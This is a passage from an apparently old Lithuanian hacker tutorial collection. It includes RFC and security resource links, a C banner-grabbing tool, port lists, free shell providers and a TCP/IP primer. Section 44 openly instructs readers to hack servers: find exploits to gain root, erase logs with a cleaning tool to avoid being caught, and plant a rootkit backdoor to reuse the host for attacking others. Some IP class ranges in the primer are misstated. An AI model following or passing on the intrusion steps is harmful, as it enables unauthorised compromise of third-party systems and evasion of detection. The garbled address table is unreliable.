stadijoje, ir entuziastai faktishkai kure interneta. Tacziau dabar RFC –
tai tiksliausia, rimcziausia ir ishsamiausia info apie tai, kaip veikia
Internetas.

Idealiausias variantas butu perskaityti ir isiminti visus RFC, bet dabar
yra serbentilijonai tu RFC’u o kai kuriems ish musu dar reikia laiko
miegui ir valgymui 🙂 Taigi, tie, kas neturi fotografines atminties ir
mariu laisvo laiko turetu atsirinkti, ka skaityti, kad rastu atsakymus i
ji dominanczius klausimus. Neblogas startas – ishsamus visu RFC’u sarashas
su ju pavadinimais, kuri rasite adresu:
ftp://ftp.tstt.net.tt/pub/inet/rfc/rfc-index

Arba RFC apie RFC’us (!) – taip, yra toks dokumentas, RFC 825, kuris,
faktishkai, yra RFC’u specifikacija. Kad ji rastumete, tiesiog i
Altavistos uzhklausimo lauka irashykite “RFC 825” (su kabutemis, butent
taip, kaip parashyta czia). Tokiu pat budu galite rasti bet koki RFC,
kurio numeri jus zhinote.

Tacziau RFC’us kartais gana sunku suprasti. Ish kur zhinoti, koki RFC’a
skaityti, kad rastume atsakyma i musu klausima? O isheitis – RFC’u grupe,
kuri vadinasi “FYIs”. Tai nera specifikacijos, o tiesiog kitu RFC’u
paaishkinimai. (Uf, jaucziuosi kaip koks Shvento Rashto aishkintojas :] )
Kur gauti tuos FYI? Pazhiurekim, ka sako shiuo klausimu RFC apie FYI
(RFC 1150) {vertimas}: FYI galima isigyti per FTP ish NIC.DDN.MIL,
nurodzhius kelia FYI:mm.txt, arba RFC:RFCnnnn.txt (kur “mm” yra FYI
numeris o “nnnn” yra “RFC” numeris). Isiloginama per FTP su username
ANONYMOUS ir password GUEST. NIC taip pat teikia automatinio pashto
paslauga tiems, kas negeli naudotis FTP. Siuskite uzhklausima adresu
SERVICE@NIC.DDN.MIL ir ‘subject’ skilty nurodykite FYI ar RFC numeri
formatu “Subject: FYI mm” arba “Subject: RFC nnnn”.

Bet netgi dar geresnis dalykas – RFC’ai susieti tarpusavyje hiperlinkais
(nuorodom) Webe adresu http://www.FreeSoft.org/Connected/
Tai yra labai cool sourc’as. Nors jame nera sudeti visi RFC’ai, bet shiame
saite yra vadovas ir naujokui patogus nuorodu i RFC’us ‘komplektas’.

Taip pat norecziau pamineti dar keleta adresu, susijusiu su kompiuteriniu
sistemu saugumu:

http://csrc.nist.gov/secpubs/rainbow/
http://GANDALF.ISU.EDU/security/security.html – security library

Operaciniu sistemu problemos ir skyles su ataku pavyzdzhiais:

http://www.netspace.org/lsv-archive/bugtraq.html – bugtraq archyvai
http://www.ntbugtraq.com – ntbugtraq

RTFM!

Bet kartais netgi perskaiczius kruva technines literaturos mes nerandam
atsakymo i musu klausima ar problemos sprendimo. Tada lieka vienintelis
budas – paklausti ishmananczio zhmogaus. Czia ir gelbsti e-konferencijos,
IRC bei newsgroup’ai.

Newsgroup’u pvz.:
alt.security
alt.2600
alt.hackers

maillist’u pvz.:
bugtraq mailing list
(ishsiuskite maila adresu listserv@netspace.org laishko turiny parashe
zhodi help ir sekite instrukcijas)

IRC kanalu pvz.:
#hakeriai
#hackers

Info apie newsgroup’us, mail-listus ir IRC kanalus galite rasti webe per
ta paczia Altavista, i uzhklausimo lauka irashe kazhka panashaus i
“security mailing lists”, etc.

Dar vienas dalykas – nueikite i http://www.scip.org
Tai yra ‘Society of Competitive Information Professionals’ saitas. Gal
susilauksite pagalbos ten? :]

Creditai: thanx Carolin Meinel, kurios rashliava ash kadaise labai
sekmingai maitinausi ir shiame texte yra daug ref i GTmHH 🙂
(http://www.happyhacker.org)

Knowledge is power!
ww0lf

Automatizuok savo darbus- patikrink servisu headerius

Ieskant tam tikros rusies servisu nera patogu kiekviena syki jungtis prie aukos
telnetu ir tikrinti servisu headerius (Pvz. telnet nasa.mil 21).
Tokiu atveju geriausia pasirasyti programa kuri pati automatizuoja tokius veiksmus.
Tad viena diena pamegnau as tokia parasyti:

/* http://www.zemrsn.lt/uid0 – code (c) SataN
testheader.c
Sitas toolsas skirtas palengvinti targeto servisu versiju patikrinima ir pan.
Ji kompilioti reikia taip:
#gcc testheader.c -o testheader
Naudotis juo paprastai galima tai:

#./testheader
arba berods galima kazkaip panasiai :
#cat hostu.sarasas.IP | while read ip, port ; do ./testheader $ip $port; done | tee headeriu.sarasas

Tada bus nuskaitomas hostu ir portu sarasas is failo ir bandoma prie junktis. rezultatas bus kitame faile.

*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

int
main (int argc, char **argv)
{
struct hostent *hp;
struct in_addr addr;
struct sockaddr_in s;
char buf[280];
int p;

if (argc < 3 )
{
printf (“usage: %s .n”, argv[0]);
exit (1);
}

hp = gethostbyname (argv[1]);
if (!hp)
exit (1);

bcopy (hp->h_addr, &addr, sizeof (struct in_addr));
p = socket (s.sin_family = AF_INET, 1, 0);
s.sin_port = htons ( atoi( argv[2] ) );
s.sin_addr.s_addr = inet_addr (inet_ntoa (addr));
if ( !connect (p, &s, sizeof (s)))
{
alarm (5);
read (p, buf, 255);
close (p);
printf (“Connected to %s (on port %s).nTarget headre is:nn%snn”, argv[1], argv[2], buf);
}
else
{
perror(“Can’t conncet to host”);
}
return 0;
}

Nesu tikras kad sis toolas yra visiskai geras- nenustebsiu
jei rasite vabaliuku- bugu.

44. Serverio nukepimas

-= Kaip nukepti serveri? =-
Nera tikslaus algoritmo kaip nuhakinti serveri. Viskas priklauso nuo serverio konfiguracijos, serverio OS etc. As cia pabandziau pateikti keleta bendru hakinimo punktu:
Suzinok kuo daugiau apie serveri: jo OS, programine iranda etc. Kaip suzinoti? Yra daug budu. Tarkim noorint suzinot ftp servo versija reikia su telnet prisijungti prie to servo per 21 porta. O sendmail versija – per 25 porta, pop – 110 etc.
Bandykite susiieskoti esamam softui exploitu. Kur ieskoti? Visur: astalavista, bugtraq etc. Surade exploita susikompiliuokit ji ir panaudokit. Taip gausite root teisias.
Dar pamenat taisykle: NEIKLIUK! ? Tad isvalyk is logu visu info apie tave. Logai gali buti ne tik standartiniai, bet uzslepti etc. Tad galima prie ju uzsikasti. Is
http://packetstorm.securify.com
galite pasiimti paketa vanish ar pan., kuris pats automatiskai pravalo logus (negarantuojama 100%).
O ka, kita karta vel ta pati? Nea. Tam yra toks dalykas BackDoor (ju pilnas inetas, rekomendoju rootkit is
http://packetstorm.securify.com
). Pasidaryk atsargini iejima. Tiesa, ji reikia gerai pakavoti, nes jei ji suseks tai viskas nais suniui ant uodegos.
Daba jau gali daryti su servu ka nori: hakinti kitus servus is jo, imti reikalinga info etc.
Is tikro hakinimas gali skirtis labai nuo situ isvardintu punktu. Bet visuomet lieka ta pacia ideja: Visos programos turi bugus, kurias turi kaskas gi pasinaudoti. Galima atrasti silpna CGI vieta, klaida filtruojant tuos zymiuosius JavaScript ir pan. Svarbiausia tokiems dalykams reikia geros vaizduotes ir geru minciu, reikia zinoti kokiu principu veikia vienoks ar kitoks softas, kurio bugu deka hakinate.

45. Servisai

Servisai ir ju portai bei protokolai
Kartais reikia zinoti kosk servisas naudoja koki porta. Is tikro galima paciam rankiniu budu pakeisti porto numeri,
bet lamos adminai to nedaro. Jie palieka porta pagal nutylejima (default port). Tad cia pateikiu servisu sarasa, ju naudojama protokola ir ju default porta.
Tiems kas naudoja kokia tai UNIX seimos operacinia sitema tai nera aktualu. Didzia dali sio saraso galima rasti /etc/services

# /etc/services:
# $Id: services,v 1.4 1997/05/20 19:41:21 tobias Exp $
#
# Network services, Internet style
#
# Note that it is presently the policy of IANA to assign a single well-known
# port number for both TCP and UDP; hence, most entries here have two entries
# even if the protocol doesn’t support UDP operations.
# Updated from RFC 1700, “Assigned Numbers” (October 1994). Not all ports
# are included, only the most common ones.
#
tcpmux1/tcp# TCP port service multiplexer
echo7/tcp
echo7/udp
discard9/tcpsink null
discard9/udpsink null
systat11/tcpusers
daytime13/tcp
daytime13/udp
netstat15/tcp
qotd17/tcpquote
msp18/tcp# message send protocol
msp18/udp# message send protocol
ahargen19/tcpttytst source
caargen19/udpttytst source
ftp-data20/tcp
ftp21/tcp
fsp21/udpfspd
ssh22/tcp# SSH Remote Login Protocol
ssh22/udp# SSH Remote Login Protocol
telnet23/tcp
# 24 – private
smtp25/tcpmail
# 26 – unassigned
time37/tcptimserver
time37/udptimserver
rlp39/udpresource# resource location
nameserver42/tcpname# IEN 116
whois43/tcpnicname
re-mail-ck50/tcp# Remote Mail Checking Protocol
re-mail-ck50/udp# Remote Mail Checking Protocol
domain53/tcpnameserver# name-domain server
domain53/udpnameserver
mtp57/tcp# deprecated
bootps67/tcp# BOOTP server
bootps67/udp
bootpc68/tcp# BOOTP client
bootpc68/udp
tftp69/udp
gopher70/tcp# Internet Gopher
gopher70/udp
rje77/tcpnetrjs
finger79/tcp
www80/tcphttp# WorldWideWeb HTTP
www80/udp# HyperText Transfer Protocol
link87/tcpttylink
kerberos88/tcpkerberos5 krb5# Kerberos v5
kerberos88/udpkerberos5 krb5# Kerberos v5
supdup95/tcp
# 100 – reserved
hostnames101/tcphostname# usually from sri-nic
iso-tsap102/tcptsap# part of ISODE.
csnet-ns105/tcpcso-ns# also used by CSO name server
csnet-ns105/udpcso-ns
#
# unfortunately the poppassd (Eudora) uses a port which has already
# been assigned to a different service. We list the poppassd as an
# alias here. This should work for programs asking for this service.
# (due to a bug in inetd the 3com-tsmux line is disabled)
#
#3com-tsmux106/tcppoppassd
#3com-tsmux106/udppoppassd
rtelnet107/tcp# Remote Telnet
rtelnet107/udp
pop-2109/tcppostoffice# POP version 2
pop-2109/udp
pop-3110/tcp# POP version 3
pop-3110/udp
sunrpc111/tcpportmapper# RPC 4.0 portmapper TCP
sunrpc111/udpportmapper# RPC 4.0 portmapper UDP
auth113/tcpauthentication tap ident
sftp115/tcp
uucp-path117/tcp
nntp119/tcpreadnews untp# USENET News Transfer Protocol
ntp123/tcp
ntp123/udp# Network Time Protocol
netbios-ns137/tcp# NETBIOS Name Service
netbios-ns137/udp
netbios-dgm138/tcp# NETBIOS Datagram Service
netbios-dgm138/udp
netbios-ssn139/tcp# NETBIOS session service
netbios-ssn139/udp
imap2143/tcpimap# Interim Mail Access Proto v2
imap2143/udpimap
snmp161/udp# Simple Net Mgmt Proto
snmp-trap162/udpsnmptrap# Traps for SNMP
cmip-man163/tcp# ISO mgmt over IP (CMOT)
cmip-man163/udp
cmip-agent164/tcp
cmip-agent164/udp
xdmcp177/tcp# X Display Mgr. Control Proto
xdmcp177/udp
nextstep178/tcpNeXTStep NextStep# NeXTStep window
nextstep178/udpNeXTStep NextStep# server
bgp179/tcp# Border Gateway Proto.
bgp179/udp
prospero191/tcp# Cliff Neuman’s Prospero
prospero191/udp
irc194/tcp# Internet Relay Chat
irc194/udp
smux199/tcp# SNMP Unix Multiplexer
smux199/udp
at-rtmp201/tcp# AppleTalk routing
at-rtmp201/udp
at-nbp202/tcp# AppleTalk name binding
at-nbp202/udp
at-echo204/tcp# AppleTalk echo
at-echo204/udp
at-zis206/tcp# AppleTalk zone information
at-zis206/udp
qmtp209/tcp# The Quick Mail Transfer Protocol
qmtp209/udp# The Quick Mail Transfer Protocol
z3950210/tcpwais# NISO Z39.50 database
z3950210/udpwais
ipx213/tcp# IPX
ipx213/udp
imap3220/tcp# Interactive Mail Access
imap3220/udp# Protocol v3
rpc2portmap369/tcp
rpc2portmap369/udp# Coda portmapper
codaauth2370/tcp
codaauth2370/udp# Coda authentication server
ulistserv372/tcp# UNIX Listserv
ulistserv372/udp
https443/tcp# MCom
https443/udp# MCom
snpp444/tcp# Simple Network Paging Protocol
snpp444/udp# Simple Network Paging Protocol
saft487/tcp# Simple Asynchronous File Transfer
saft487/udp# Simple Asynchronous File Transfer
npmp-local610/tcpdqs313_qmaster# npmp-local / DQS
npmp-local610/udpdqs313_qmaster# npmp-local / DQS
npmp-gui611/tcpdqs313_execd# npmp-gui / DQS
npmp-gui611/udpdqs313_execd# npmp-gui / DQS
hmmp-ind612/tcpdqs313_intercell# HMMP Indication / DQS
hmmp-ind612/udpdqs313_intercell# HMMP Indication / DQS
#
-= UNIX specific services =-
#
exec512/tcp
biff512/udpcomsat
login513/tcp
who513/udpwhod
shell514/tcpcmd# no passwords used
syslog514/udp
printer515/tcpspooler# line printer spooler
talk517/udp
ntalk518/udp
route520/udprouter routed# RIP
timed525/udptimeserver
tempo526/tcpnewdate
courier530/tcprpc
conference531/tcpchat
netnews532/tcpreadnews
netwall533/udp# -for emergency broadcasts
uucp540/tcpuucpd# uucp daemon
afpovertcp548/tcp# AFP over TCP
afpovertcp548/udp# AFP over TCP
remotefs556/tcprfs_server rfs# Brunhoff remote filesystem
klogin543/tcp# Kerberized `rlogin’ (v5)
kshell544/tcpkrcmd# Kerberized `rsh’ (v5)
kerberos-adm749/tcp# Kerberos `kadmin’ (v5)
#
webster765/tcp# Network dictionary
webster765/udp
#
# From “Assigned Numbers”:
#
#> The Registered Ports are not controlled by the IANA and on most systems
#> can be used by ordinary user processes or programs executed by ordinary
#> users.
#
#> Ports are used in the TCP [45,106] to name the ends of logical
#> connections which carry long term conversations. For the purpose of
#> providing services to unknown callers, a service contact port is
#> defined. This list specifies the port used by the server process as its
#> contact port. While the IANA can not control uses of these ports it
#> does register or list uses of these ports as a convienence to the
#> community.
#
ingreslock1524/tcp
ingreslock1524/udp
prospero-np1525/tcp# Prospero non-privileged
prospero-np1525/udp
datametrics1645/tcpold-radius# datametrics / old radius entry
datametrics1645/udpold-radius# datametrics / old radius entry
sa-msg-port1646/tcpold-radacct# sa-msg-port / old radacct entry
sa-msg-port1646/udpold-radacct# sa-msg-port / old radacct entry
radius1812/tcp# Radius
radius1812/udp# Radius
radacct1813/tcp# Radius Accounting
radacct1813/udp# Radius Accounting
cvspserver2401/tcp# CVS client/server operations
cvspserver2401/udp# CVS client/server operations
venus2430/tcp# codacon port
venus2430/udp# Venus callback/wbc interface
venus-se2431/tcp# tcp side effects
venus-se2431/udp# udp sftp side effect
codasrv2432/tcp# not used
codasrv2432/udp# server port
codasrv-se2433/tcp# tcp side effects
codasrv-se2433/udp# udp sftp side effect
mysql3306/tcp# MySQL
mysql3306/udp# MySQL
rfe5002/tcp# Radio Free Ethernet
rfe5002/udp# Actually uses UDP only
cfengine5308/tcp# CFengine
cfengine5308/udp# CFengine
bbs7000/tcp# BBS service
#
# Kerberos (Project Athena/MIT) services
# Note that these are for Kerberos v4, and are unofficial. Sites running
# v4 should uncomment these and comment out the v5 entries above.
#
kerberos4750/udpkerberos-iv kdc# Kerberos (server) udp
kerberos4750/tcpkerberos-iv kdc# Kerberos (server) tcp
kerberos_master751/udp# Kerberos authentication
kerberos_master751/tcp# Kerberos authentication
passwd_server752/udp# Kerberos passwd server
krb_prop754/tcp# Kerberos slave propagation
krbupdate760/tcpkreg# Kerberos registration
kpasswd761/tcpkpwd# Kerberos “passwd”
kpop1109/tcp# Pop with Kerberos
knetd2053/tcp# Kerberos de-multiplexor
zephyr-srv2102/udp# Zephyr server
zephyr-clt2103/udp# Zephyr serv-hm connection
zephyr-hm2104/udp# Zephyr hostmanager
eklogin2105/tcp# Kerberos encrypted rlogin
#
# Unofficial but necessary (for NetBSD) services
#
supfilesrv871/tcp# SUP server
supfiledbg1127/tcp# SUP debugging
#
# Datagram Delivery Protocol services
#
rtmp1/ddp# Routing Table Maintenance Protocol
nbp2/ddp# Name Binding Protocol
echo4/ddp# AppleTalk Echo Protocol
zip6/ddp# Zone Information Protocol
#
# Services added for the Debian GNU/Linux distribution
#
poppassd106/tcp# Eudora
poppassd106/udp# Eudora
mailq174/tcp# Mailer transport queue for Zmailer
mailq174/tcp# Mailer transport queue for Zmailer
ssmtp465/tcp# SMTP over SSL
gdomap538/tcp# GNUstep distributed objects
gdomap538/udp# GNUstep distributed objects
snews563/tcp# NNTP over SSL
ssl-ldap636/tcp# LDAP over SSL
omirr808/tcpomirrd# online mirror
omirr808/udpomirrd# online mirror
rsync873/tcp# rsync
rsync873/udp# rsync
simap 993/tcp# IMAP over SSL
spop3995/tcp# POP-3 over SSL
socks1080/tcp# socks proxy server
socks1080/udp# socks proxy server
rmtcfg1236/tcp# Gracilis Packeten remote config server
xtel1313/tcp# french minitel
support1529/tcp# GNATS
cfinger2003/tcp# GNU Finger
ninstall2150/tcp# ninstall service
ninstall2150/udp# ninstall service
afbackup2988/tcp# Afbackup system
afbackup2988/udp# Afbackup system
icp3130/tcp# Internet Cache Protocol (Squid)
icp3130/udp# Internet Cache Protocol (Squid)
postgres5432/tcp# POSTGRES
postgres5432/udp# POSTGRES
fax4557/tcp# FAX transmission service (old)
hylafax4559/tcp# HylaFAX client-server protocol (new)
noclog5354/tcp# noclogd with TCP (nocol)
noclog5354/udp# noclogd with UDP (nocol)
hostmon5355/tcp# hostmon uses TCP (nocol)
hostmon5355/udp# hostmon uses TCP (nocol)
ircd6667/tcp# Internet Relay Chat
ircd6667/udp# Internet Relay Chat
webcache8080/tcp# WWW caching service
webcache8080/udp# WWW caching service
tproxy8081/tcp# Transparent Proxy
tproxy8081/udp# Transparent Proxy
mandelspawn9359/udpmandelbrot# network mandelbrot
amanda10080/udp# amanda backup services
kamanda10081/tcp# amanda backup services (Kerberos)
kamanda10081/udp# amanda backup services (Kerberos)
amandaidx10082/tcp# amanda backup services
amidxtape10083/tcp# amanda backup services
isdnlog20011/tcp# isdn logging system
isdnlog20011/udp# isdn logging system
vboxd20012/tcp# voice box system
vboxd20012/udp# voice box system
binkp24554/tcp# Binkley
binkp24554/udp# Binkley
asp27374/tcp# Address Search Protocol
asp27374/udp# Address Search Protocol
tfido60177/tcp# Ifmail
tfido60177/udp# Ifmail
fido60179/tcp# Ifmail
fido60179/udp# Ifmail
# Local services
linuxconf 98/tcp
swat 901/tcp # Add swat service used via inetd

-= NT specifiniai portai: =-

Ne visi serveriai stovi ant UNIX sistemu. Daugelis stovi ir ant NT. Kaip zinia NT dauguma servisu poru skirtingi negu UNIX.
Tad cia pateikiu NT portus ir protokolus.

-= Open Service Ports =-
Windows NT Functionality UDP TCP IP

Browsing 137,138
DHCP Lease 67,68
DHCP Manager 135
DNS Administration 139
DNS Resolution 53
File Sharing 139
Logon Sequence 137,138 139
NetLogon 138
NT Diagnostics 139
NT Directory Replication 138 139
NT Event Viewer 139
NT Performance Monitor 139
NT Registry Editor 139
NT Secure Channel 137,138 139
NT Server Manager 139
NT Trusts 137,138 139
NT User Manager 139
Pass Through Validation 137,138 139
PPTP 1723 47
Printing 137,138 139
WINS Manager 135
WINS Registration 137
WINS Replication 42
————————————————————————
Exchange Functionality

Client/Server Comm. 135
Exchange Administrator 135
IMAP 143
LDAP 389
LDAP (SSL) 636
MTA – X.400 over TCP/IP 102
POP3 110
RPC 135
SMTP 25

46. Shell dykai

-=Turinys=-

-=1. Kas yra shell?=-
-=2. Kur galima gauti shell uz dyka?=-

-=1. Kas yra shell?=-

Shell yra komandu interpretatorius, kuris vercia jusu komandas i suprantamas operaciniai sistemai komandas. Dazniausiai kai apie shell kalbama, turima galvoje *NIX shell (bash, sh etc). Is tikro ir windows turi shell. Jis yra command.com.
Su shell galimi tokie veiskmai: failu, katalogu tvarkymas, failu vykymas, redagavimas, kurimas, isnaudoti savo hardware.

-=2. Kur galima gauti shell uz dyka?=-

Cia pateikiu trumpa sarasa kur galima gauti shell uz dyka bei trumpa to shell aprasyma.

http://www.Linuxshell.org
Duoda nemokama Linux Shell akaunta, www vietos (5MB) ir POP3 email.

http://www.ShellYeah.org
Leidzia IRC (IRC-II Epic arba Bitch), Pine e-mail`ui, USENET Tin, ICQ su Micq.
Shell`as sedi po unix, galite naudot arba Bash arba Tcsh interpretatoriu ir kurti shell scenarijus (skriptus).

http://www.DucTape.net
UNIX sistemos shell. Leidzia naudotis IMAP Email ir keleta kitu servisu.

http://www.Freeshells.net
Pine, Pico, IRC (bX ir ircII client),Bash shell, lynx, PERL ir .cgi!

http://www.NYX.net
Duoda nemokama UNIX shell.

http://www.Nether.Net
Linux Box shell`as.

http://www.Arbornet.org/Projects.html
M-Net yra “America’s First Public Access UNIX System.” Kad prisjungtumet prie M-Net,
rasykite : telnet m-net.arbornet.org. Kad sukurtumete nauja acounta iveskite login dalyje: “prompt”. Leidzia naudotis e-mail,
lynx, ftp, IRC, kompiletoriais. Leidzia tureti www puslapi.

Jugbone
http://www.jugbone.cx
Jugbone yra standartinis UNIX shell ir leidzia naudotis kompiletoriais, IRC kliantais, pastu etc.

47. TCP/IP totorial`as

Internetas- didziausias pasaulio globalusis tinklas.
TCP/IP yra protokolas (tiksliau protokolu rinkinys) jungiantis daug kompiuteriu ir uztikrinanis gera duomenu perdavimo kokybe etc.
TCP/IP susideda is dag protokolu:

TCP (Transmission Control Protocol) – protokolas, orientuotas i susijungimus, kuris garantuoja patikima baitu srauto perdavima tarp dvieju sistemu.

UDP (User Datagram Protocol) – protokolas skirtas vartotojiskiems procesams, dirbantis be susijungimo patikrinimo. Priesingai nei TCP, kuris priklauso
patikimiems protokolams, nera garantijos, kad UDP pasiusti duomenys pasieks adresata.

ICMP (Internet Control Message Protocol) protokolas palaiko informacijos apie klaidas perdavima ir valdo informacija tarp tinklo sliuzu ir mazgu. ICMP pranesimai generuojami ir apdorojami Interneto programine iranga, o ne vartotojiskais procesais.
IP (Internet protocol) – protokolas tarnaujantis duomenu paketu persiuntimui TCP, UDP ir ICMP protokolams. IP aptarnauja kompiuteriu susijungimus, naudojant taip vadinama IP adresacija.

ARP (Adress Resoliution Protocol) – sis protokolas pavercia Interneto adresa i irenginio adresa (pavyzdziui, kanalu (Data Link) lygyje Ethernet tipo irenginiui).

RARP (Reverse Adress Resoliution Protocol) – pavercia irenginio adresa i Interneto adresa.

FTP (File Transfer Protocol) aptarnauja failu perdavima TCP
protokolu. Apie FTP yra atskiras straipsnis (ziureti virsuj arba spausti cia).

TELNET (Remote Login). Sis protokolas leidzia terminalu prisijungti prie
nutolusios sistemos.

SMPT (Simple Mail Transfer Protocol) – TCP protokolo pagalba suteikia galimybe siusti elektronini pasta DNS (Domain Name Service) – aptarnauja simbolinio adreso
Interneto adresu pavertima.

NFS (Network File System) protokolas suteikia galimybe tvarkyti nutolusio kompiuterio failus.

-=Kas yra IP adresas?=-

IP adresas tai unikalus adresas atitinkantis tam fizini objekta (kompiuteri, roiteri). Kiekvienas kompiuteris prie Interneto jungiasi unikaliu IP adresu.

-=Kokie yra IP adresu tipai?=-

Kiekvienas kompiuteris TCP/IP tinkle turi triju lygiu adresus:

fizinis (MAC adresas)
tinklinis (IP adresas)
simbolinis (DNS vardas)

-=Kas yra MAC tipo adresas?=-

MAC tinklinio adapterio adresas arba marsrutizatoriaus portas, pavyzdziui, 11-A0-17-3D-BC-01. Siuos adresus nustato gamintojai ir be to jie yra unikalus, nes yra centralizuotai valdomi. MAC adresai turi 6 Baitu formato: vyresnieji 3 baitai – gamintojo kodas, o mazesnieji 3 baitai nustatomi gamintoju tam tikru budu. Globalus tinklai, tokie kaip X.25 arba Frame Relay, lokalu adresa nustato tinklo administratorius.

-=Kas yra IP tipo adresas?=-

IP – adresas, kuri sudaro 4 baitai, pavyzdziui, 109.26.17.100. Sis adresas naudojamas tinkle. Ji nustato administratorius, kompiuterio ir marsrutizatoriu konfiguravimo metu. IP adresas susideda is dvieju daliu: tinlo ir mazgo numerio. Tinklo numeris gali buti parinktas administratoriaus, arba pagal specialios organizacijos, Network Information Center (NIC) rekomendacijas, kai tinklas turi dirbti kaip Interneto dalis.

Daznai Interneto paslaugu tiekejai (provaiders) gauna tam tikru adresu intervala is NIC organizacijos, o po to paskirsto juos savo abonentams. Mazgo numeris IP adrese nustatomas nepriklausant lokalaus adreso mazgui. IP adreso dalinimas i dvi dalis yra lankstus, ir ribas tarp siu lauku galima nustatyti labai paprastai. Mazgas gali ieiti i kelis IP tinklus. Tokiu atveju mazgas turi tureti kelis IP adresus, pagal tinklu skaiciu. Taigi IP adresas nusako ne atskira kompiuteri arba marsrutizatoriu, bet viena tinlini sujungima.

-=Kas yra DNS tipo adresas?=-

Simbolinis identifikatorius-vardas (DNS), pavyzdziui SERV1.COM. Si adresa sukuria administratorius ir ji sudaro kelios dalys, pavyzdziui kompiuterio vardas, organizacijos pavadinimas, domenas. DNS yra naudojamas programiniame lygyje,pavyzdziui FTP ir TELENT protokoluose.

-=Kaip vaizduojamas IP adresas?=-

IP adreso dydis 4 baitai ir daznaiusiai yra uzrasomas keturiu skaiciu seka, kurioje kievienas baitas yra desimtaineje formoje ir atskiriamas vienas nuo kito taskais. 128.10.2.30 – tradicine adreso vaizdavimo forma desimtaineje sistemoje.
10000000 00001010 00000010 00011110 – adresas, dvejetaineje sistemoje.

-=Kaip sudaromas IP adresas?=-

Adresa sudaro dvi logines dalys – tinklo numeris ir mazgo numeris tinkle. Kokia dalis adreso priklauso tinklo numeriui, o kokia dalis mazgo numeriui, nustatoma pagal pirmus adreso bitus.

I kokias klases skirstomi TCP/IP adresai?

Jei adreso pirmas bitas yra 0, tai tinklas priklauso A klasei, ir tinklo numeris uzima 1 baita, mazgo numeris – 3 baitus. A klases tinklo skaicius yra intervale nuo 1 iki 126. Skaicius 0 nenaudojamas, o skaicius 127 rezervuotas specialiems tikslams.

Jei adreso pirmi du bitai lygus 10, tai tinklas priklauso B klasei ir yra vidutiniu tinklu dydzio. B klases tinklo adresui ir mazgo adresui skiriami 16 bitu, tai yra po 2 baitus.

Jei adresas prasideda skaiciu seka 110, tai jis priklauso C klases tinklui. Tinklo adresui skiriami 24 bitai, o mazgo adresui 8 bitai.

Jei adresas prasideda seka 1110, tai jis priklauso D klasei ir yra ypatingas, vadinamas MULTICAST. Jei duomenu pakete adresas priklauso D klasei, tai toki paketa turi gauti visi mazgai, kurie priskirti duotam adresui.

Jei adresas prasideda 11110, tai jis priklauso E klasei ir yra rezervuotas ateiciai.

Kokiai klasei priklauso tam tikras adresas?

Klase Mazausias adresas Didziausias adresas

A 0.1.0.0 126.0.0.0

B 128.0.0.0 191.255.0.0

C 192.0.1.0 223.255.255.0

D 224.0.0.0 239.255.255.255

E 240.0.0.0 247.255.255.255

-=Kas yra marsrutizacija?=-

Kiekvienas paketas, einantis per tinkla turi gavejo adresa, ir yra siunciamas pagal numatytas marsrutizacijos taisykles.

Marsrutizavimas – tai duomenu paketo siuntimas per tinkla labirintus, esancius tarp saltinio ir adresato.

-=Kokie yra specialus IP adresai?=-

Jei IP adresa sudaro tik nuliai dvejetaineje sistemoje, tai jis nurodo adresa to mazgo, kuris sugeneravo si paketa. (0.0.0.0)

Jei tinklo skaiciu lauke yra nuliai (0000..000, Mazgo numeris), tai pagal nutylejima skaitoma, kad sis mazgas priklauso tam paciam tinklui, kaip ir mazgas, kuris nusiunte paketa. (pvz.: 0.0.0.1)

Jei visi IP adresai dvejetaineje sistemoje yra 1, tai paketas su tokiu tikslo adresu privalo buti issiustas visiems mazgams, esantiems siame tinkle, kaip ir paketo saltinis. Toks siuntimas vadinamas LIMITED BROADCAST.

Jei mazgo lauke dvejetaineje sistemoje yra vienetai (Tinklo numeris, 111..111), tai paketas turintis toki adresa yra siunciamas visiems tinklo mazgams su uzduotu numeriu. Tai vadinama BROADCAST.

Adresas 127.0.0.1 rezervuotas atgalinio rysio organizavimui, testuojant programine iranga nesiunciant duomenu paketo i tinkla. Jis vadinamas LOOPBACK.

IP adresas priklausantis D klasei (MULTICAST) reiskia, kad paketas turi buti issiustas iskarto keliems mazgams, nurodytiems adreso lauke. Mazgai patys save nustato, kuriai grupei jie priklauso. Vienas ir tas pats mazgas gali ieiti i kelias grupes. Tokie pranesimai vadinami MULTICAST. Grupinis adresas nera dalinamas i tinklo ir mazgo laukus. Jis apdorojamas ypatingu budu marsrutizatoriaus.

-=Kaip nustatomas IP adresas?=-

IP protokole, t.y. kompiuterio adresas arba marsrutizatoriaus portas, nustatomas tinklo administratoriaus ir jis nera tiesiogiai susijes su lokaliu adresu, kaip tai padaryta IPX protokole.

-=Kas yra DNS?=-

DNS (Domain Name System) – tai duomenu baze, palaikanti hierarchine sistema Internete. DNS tarnyba skirta automatinei IP adreso paieskai zinant simbolini mazgo varda.

-=Kas yra domenas?=-

Domenas – tai simbolinio DNS vardo priesaga, pvz; .lt.
Domeno vardas gali buti iki 63 simboliu. Kiekvienas kompiuteris Internete turi savo pilna domeno varda (fully qualified domain name, FQDN).

-=Kas yra DNS serveris ir klientas?=-

DNS yra pagalbinis protokolas. Jis nera simetriskas nes jame nustatyti DNS serveriai ir DNS klientai. DNS serveriai laiko dali duomenu bazes apie simbolinius IP adresu vardus. Si duomene baze paskirstyta pagal Interneto administracinius domenus. DNS
klientai zino administracinio domeno, DNS serverio, IP adresa ir IP protokolo pagalba perduoda uzklausa, kurioje pranesa simbolini varda ir praso grazinti IP adresa.

Jei duomenys apie uzklausa laikomi DNS serverio duomenu bazeje, tai jis is karto pasiuncia atsakymu klientui, jei ne – serveris siuncia uzklausa kitam domeno DNS serveriui, kuris arba pats apdoroja uzklausa arba persiuncia ji kitam serveriui. Visi DNS serveriai yra sujungti hierarchiskai, priklausomai nuo domeno tinklo hierarchijos Internete.

-=Kas yra DHCP protokolas?=-

Kaip jau buvo mineta, IP adresas gali buti paskirtas tinklo administratoriaus. Tai uzima daug laiko. Problema yra ir vartotojai, mazai zinantys apie kompiuterio konfiguravimo, tad visos bedos tenka administratoriui.

Dynamic Host Configuration Protocol (DHCP) buvo sukurtas tam, kad palengvintu administratoriu darba. Pagrinidinis sio protokolo tikslas yra dinaminis IP adresu paskyrimas. Taip pat jis palaiko rankini ir automatini statinii adresu paskyrima.

Dinaminis adresu paskirstymas leidzia kurti IP tinkla, kuriame mazgu skaicius virsija esama skaiciu IP adrese. DHCP yra patikimas ir paprastas TCP/IP tinklo konfiguratorius, garantuojantis, kad nebus vienodu adresu.

